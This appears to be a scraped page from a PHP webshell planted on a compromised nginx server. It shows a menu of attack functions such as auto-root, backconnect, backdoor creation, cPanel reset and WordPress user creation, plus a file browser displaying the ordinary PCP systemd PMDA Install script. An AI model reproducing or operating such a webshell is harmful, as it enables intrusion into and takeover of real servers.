Linux ubuntu 6.8.0-90-generic #91-Ubuntu SMP PREEMPT_DYNAMIC Tue Nov 18 14:14:30 UTC 2025 x86_64
nginx/1.24.0
: 67.217.245.49 | : 216.73.216.153
Cant Read [ /etc/named.conf ]
8.3.6
www-data
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
pcp /
pmdas /
systemd /
[ HOME SHELL ]
Name
Size
Permission
Action
Install
1.84
KB
-rwxr-xr-x
README
1.74
KB
-rw-r--r--
Remove
738
B
-rwxr-xr-x
domain.h
60
B
-rw-r--r--
help
2.29
KB
-rw-r--r--
pmdasystemd
22.37
KB
-rwxr-xr-x
pmns
1014
B
-rw-r--r--
root
99
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Install
#! /bin/sh # # Copyright (c) 2011-2013 Red Hat Inc. # Copyright (c) 1997 Silicon Graphics, Inc. All Rights Reserved. # # This program is free software; you can redistribute it and/or modify it # under the terms of the GNU General Public License as published by the # Free Software Foundation; either version 2 of the License, or (at your # option) any later version. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY # or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License # for more details. # # Install the systemd PMDA and/or PMNS # . $PCP_DIR/etc/pcp.env . $PCP_SHARE_DIR/lib/pmdaproc.sh iam=systemd pipe_opt=true daemon_opt=true # On some platforms, the 'adm' user does not exist, so the pmda needs # to run as root, to get full access to the systemd journal # On other systems, a process needs to belong to group 'systemd-journal' # to access the systemd journal. args='' whoami=`which whoami 2>/dev/null` haveadm="`su adm -s $whoami 2>/dev/null`" if [ "x$haveadm" != "xadm" ]; then args="-Uroot" echo "Warning: user adm not found, running PMDA as root" echo else journalctl=`which journalctl 2>/dev/null` if [ -n "$journalctl" ] then if su adm -s /bin/sh -c "$journalctl --this-boot --lines=1 --no-pager >/dev/null 2>$__tmp.err" then # all good ... PMDA default is to run as the user adm : else #debug# cat $__tmp.err echo "Warning: user adm cannot run journalctl, running PMDA as root" echo args=-Uroot fi else # not sure what sort of system this might be that has user adm and # systemd installed, but no journalctl ... # but run PMDA as root as the fall back option echo "Warning: journalctl(1) not found, running PMDA as root" echo args=-Uroot fi fi pmdaSetup pmdaInstall exit
Close